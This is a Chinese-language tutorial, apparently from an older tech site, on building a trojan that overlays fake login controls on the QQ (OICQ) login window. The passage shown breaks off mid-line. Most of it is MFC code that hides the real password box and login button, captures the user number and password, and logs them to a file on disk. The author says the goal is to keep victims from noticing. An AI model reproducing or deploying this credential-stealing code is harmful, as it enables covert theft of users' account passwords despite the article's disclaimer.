黑客攻击手段之偷梁换柱
作者:何建敏
申明:本文旨在分析黑客攻击的手段,请勿用于非法目的!
Internet的发展,带动了IT界的一次大飞跃,黑客的活动也随之日益猖獗,攻击手法不断变化。各种黑客程序也是层出不穷,木马程序更是花样百出。如:监视键盘按键、替换登录程序等,现在我就来介绍另一种攻击手法,替换登录程序按钮。这招绝吧!现在我就来将方法介绍一下。
就拿我们很熟悉的OICQ来作一个例子,看看程序到底是如何实现偷梁换柱的。要替换OICQ的登录程序的按钮与密码框,首先就得捕获OICQ登录程序的登录按钮和密码框句柄。哈哈,要是换上了我们自己的按钮与密码框,不就是想干什么就干什么了吗。
示例源代码下载 大小:24K
如上图所示,我们要取得4个CWnd句柄,分另是:用户号码的CComBox、用户口令CEdit、登录按扭CButton、主对话框句柄。
m_hOicq=FindWindow(NULL,"QQ用户登录");m_hOk=CWnd::FromHandle(FindWindowEx(m_hOicq->GetSafeHwnd(),NULL,"BUTTON","登录"));m_hEdit=CWnd::FromHandle(FindWindowEx(m_hOicq->GetSafeHwnd(),NULL,"EDIT",NULL));m_hCom=CWnd::FromHandle(FindWindowEx(m_hOicq->GetSafeHwnd(),NULL,"ComboBox",NULL));///上面的m_hOicq,m_hOk,m_hEdit,m_hCom分别为CWnd *类型有了这四个句柄,接下来的事就好办多了,那现在我们就直接生成一个按扭和一个编辑框吧。代码如下
CFont *m_font=m_hOk->GetFont();CFont *m_font1=m_hEdit->GetFont();CRect rect;CRect rect1;m_hOk->GetWindowRect(rect);m_hOk->ScreenToClient(rect);m_hEdit->GetWindowRect(rect1);m_hEdit->ScreenToClient(rect1);rect.left+=14;rect.top+=117;rect.bottom+=117;rect.right+=14;rect1.left+=110;rect1.top+=56;rect1.bottom+=56;rect1.right+=110;m_hOk->ShowWindow(SW_HIDE);//隐藏登录按钮m_hEdit->ShowWindow(SW_HIDE);//银藏密码框if(m_button.Create("登录",WS_CHILD|WS_VISIBLE|WS_TABSTOP|BS_DEFPUSHBUTTON,rect,m_hOicq,IDC_STARTBUTTON)==FALSE)MessageBox("error");m_button.SetFont(m_font,TRUE);m_button.SetWnd(this);m_button.SetID(IDC_STARTBUTTON);if(m_edit.CreateEx(0x204,"Edit","",0x500100A0,rect1,m_hOicq,IDC_MYEDIT)==FALSE)MessageBox("error1");m_edit.SetFont(m_font1,TRUE);m_edit.SetFocus();m_edit.SetWnd(this); 上面代码中的m_button为CMyButton类型变量,m_edit为CMyEdit类型变量,请继续往下看。这两个控件生成了!但是光生成两个控件还没用,我们得让两个控件告诉我们什么时候按了回车,什么时候点击了Mouse左键。那就得对EDIT、BUTTON做一下处理才行。用ClassWinzard生成二个派生类CMyEdit、CMyButton,分别生成WM_LBUTTONUP、PreTranslateMessage,让它处理相应的按键事件。并通讯事件发个消息给我的主对话框,那就要取得我的对话框的句柄,在两个派生类中分别生成函数
SetWnd(CWnd *pWnd)用于告知主对话框的窗口句柄。
在CMyEdit的 PreTranslateMessage(MSG* pMsg)中输入
if(pMsg->message==WM_KEYDOWN){if(pMsg->wParam==VK_RETURN)m_wnd->SendMessage(WM_ButtonDown,0,0);} 在CMyButton的OnLButtonUp(UINT nFlags, CPoint point)中输入
m_wnd->SendMessage(WM_ButtonDown,0,0);
以上将一个消息发送到我的对话框,我得把消息处里一下,做的干净漂亮些,这样用的人才不会知道我个木马程序在偷偷监视他们
CString Password,cc;char LoginName[20] ;memset(LoginName,0,20);::SendMessage(m_hCom->GetSafeHwnd(), WM_GETTEXT, 20, (LPARAM)LoginName);m_edit.GetWindowText(Password);m_edit.ShowWindow(SW_HIDE);m_hEdit->ShowWindow(SW_SHOW);m_hOk->ShowWindow(SW_SHOW);cc=0x0d;cc+=0x0a;CFileFind m_find;CFile m_file;if(!m_find.FindFile("c:\oicqlog.dat"))m_file.Open("c:\oicqlog.dat",CFile::modeCreate|CFile::modeWrite,NULL);else{m_file.Open("c:\oicqlog.dat",CFile::modeWrite);m_file.SeekToEnd();}m_file.Write(cc,cc.GetLength());m_file.Write(LoginName,sizeof(LoginName));m_file.Write(cc,cc.GetLength());m_file.Write(Password,Password.GetLength());m_file.Close();m_hEdit->SetFocus();char *ee=Password.GetBuffer(Password.GetLength());::SendMessage(m_hEdit->GetSafeHwnd(),WM_SETTEXT,20,(LPARAM)ee);keybd_event(VK_RETURN,0,0 
